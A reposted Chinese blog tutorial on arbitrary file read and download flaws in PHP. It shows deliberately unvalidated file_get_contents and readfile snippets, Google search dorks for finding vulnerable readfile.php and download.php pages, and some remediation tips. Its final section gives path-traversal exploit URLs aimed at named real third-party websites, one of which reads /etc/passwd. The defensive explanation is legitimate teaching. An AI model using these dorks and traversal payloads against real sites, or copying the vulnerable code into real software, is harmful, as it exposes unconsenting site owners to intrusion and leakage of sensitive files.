任意文件读取与下载

最新推荐文章于 2024-08-22 09:44:18 发布
最新推荐文章于 2024-08-22 09:44:18 发布
阅读量241 收藏
点赞数
文章标签: php
原文链接:https://yq.aliyun.com/articles/489942
版权

0x01 文件读取

    文件读取在PHP这种可以有很多种方式实现,在web的默认情况下,$filename变量可能用户可控

1
2
3
4
5
6
<?php
$filename  $_GET [ 'f' ];
echo  file_get_contents ( $filename );
?>
#当变量  $filename  没有经过校验,或者校验不严格,用户可以控制这个变量读取任意文件,例如
/etc/passwd、/config.ini 等文件

0x02 实现文件下载的两种方式

    1.直接下载:

1
< a  href = "http://www.xxx.com/xxx.rar" ></ a >

    2.增加header头

1
2
3
4
5
6
7
<?php
$filename  $_GET [ 'f' ];
header( 'Content-Type:image/gif' );
header( 'Content-Disposition:attachment;filename=' . $filename );
header( 'Content-Length:' . filesize ( $filename ));
readfile( $filename );
?>

    当$filename没有经过校验,或者校验不合格,用户可以控制这个变量下载任意文件,比如/etc/passwd,./index.php、等等就造成了任意文件下载漏洞。


0x03 成因

    都有读取文件的函数

    读物文件的路径用户可控,且没有经过校验,或者校验不严格

    都输出文件内容


0x04 Google Serch

1
2
inurl: "readfile.php?file="
inurl: "download.php?file="


0x05 修复方案

    过滤<.>(点)

    正则判断用户输入的参数格式,匹配输入的格式是否合格

    php.ini配置open_basedir


0x06 实例漏洞利用

(仅供测试,请勿随意破坏)

地址:

1
url:http: //hypnet.org.uk/shared/readfile.php?file=mental_health_audit_2014_06_15_130552.ppt

漏洞利用:

1
http: //hypnet.org.uk/shared/readfile.php?file=../../../../../../../../../../etc/passwd

地址:

1
url:http: //storiedifarina.it/readfile.php?file=pdf/storiedifarina.pdf

漏洞利用

1
http: //www.wodehouse.se/upload/readfile.php?file=../index.php




本文转自 nw01f 51CTO博客,原文链接:http://blog.51cto.com/dearch/1836973,如需转载请自行联系原作者
weixin_34236869
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP代码审计之任意文件读取
qq_22132931的博客
12-02 683
PHP代码审计之任意文件读取
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
Apache Tomcat任意文件读取漏洞和命令执行漏洞源码分析(CVE-2020-1938)
午夜安全
03-27 2752
CVE-2020-1938(Tomcat源码漏洞分析) 环境准备 在分析Tomcat源码漏洞之前,我们先需要使用Idea配置Tomcat源码,请参考:https://blog.csdn.net/SouthWind0/article/details/105147406 漏洞分析 Tomcat在默认的conf/server.xml中配置了2个Connector,一个默认监听8080端口处理HT...
幽灵猫 Tomcat文件读取/任意文件包含漏洞(CVE-2020-1938 / CNVD-2020-10487)
m0_62466350的博客
05-11 3805
该漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
Web的基本漏洞--任意文件读取下载漏洞
尽欢的博客
06-05 2377
任意文件读取漏洞介绍、任意文件下载漏洞介绍、常见的敏感文件
任意文件读取 下载漏洞总结_任意文件下载漏洞,2024年最新2024网络安全开发面试题及答案
m0_74918915的博客
04-14 1074
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
任意文件读取下载漏洞学习
不想当脚本小子的脚本小子
01-25 3951
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
任意文件下载/读取漏洞
L_lemo004的博客
09-22 2479
文章目录任意文件下载/读取下载文件WindowsLinuxSSHNginx任意文件读取的利用思路进一步推断系统版本无痕反弹shell常用默认路径整理sshNginxApachejettyresintomcatsvn一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载文件不做限制,则恶意用户就能够查看或下载任意敏感文件利用条件危害利用思路目的漏洞验证修复方案 任意文件下载/读取下载文件 Windows C:\boot.ini //查看系统版本 C:\Windows\Syst
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
实习笔记—Apache Tomcat的任意文件读取漏洞
JSH_CDX的博客
07-02 1007
一. 前言 实习的第一个任务便是验证漏洞,用了两天时间才验证完毕,刚开始的思路是对的,只不过一开始验证不成功,没有坚持下去,后面走老路用新的方法才测试成功。 二.测试思路 对于这个新披露的漏洞,msf上一般不会存在对应的EXP,这时候可以先查看受该漏洞影响的Tomcat版本以及修复建议,再查看待测试主机的Tomcat版本以及配置信息。 三.漏洞描述 Apache Tomcat 是一个免费的开源 W...
任意文件读取
qq_45953122的博客
08-31 1199
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。
文件操作之文件下载文件读取
qq_44005305的博客
03-16 992
原理:原理案例检测怎么寻找文件下载漏洞?利用方面文件目录的获取分两种文件类型:常见文件、敏感文件实际案例演示Javaweb文件下载代码当贝市场(通过功能点找到漏洞)RoarCTF2019-文件读取真题复现-比赛(通过查看参数值发现漏洞 )小米路由器(文件读取)CVE-2019-18371。
任意文件读取/下载漏洞
qq_68163788的博客
05-23 2696
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
文件读写(相关函数详解)
2302_80105876的博客
04-07 965
文件 函数 文件读取错误检查 文件随机读写 文件顺序读写 sscanf函数 sprintf函数 文件指针
推荐一个完全自由的目录设计网站
最新发布
qq_30049249的博客
08-22 433
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
OurPHP 1.8任意文件读取漏洞分析与修复
然而,在其1.8版本中,存在一个严重的安全漏洞,即任意文件读取漏洞。这个漏洞允许未经身份验证的攻击者通过特定方式访问和读取服务器上的任意文件,包括可能包含敏感信息的系统配置文件、数据库连接文件等。 漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值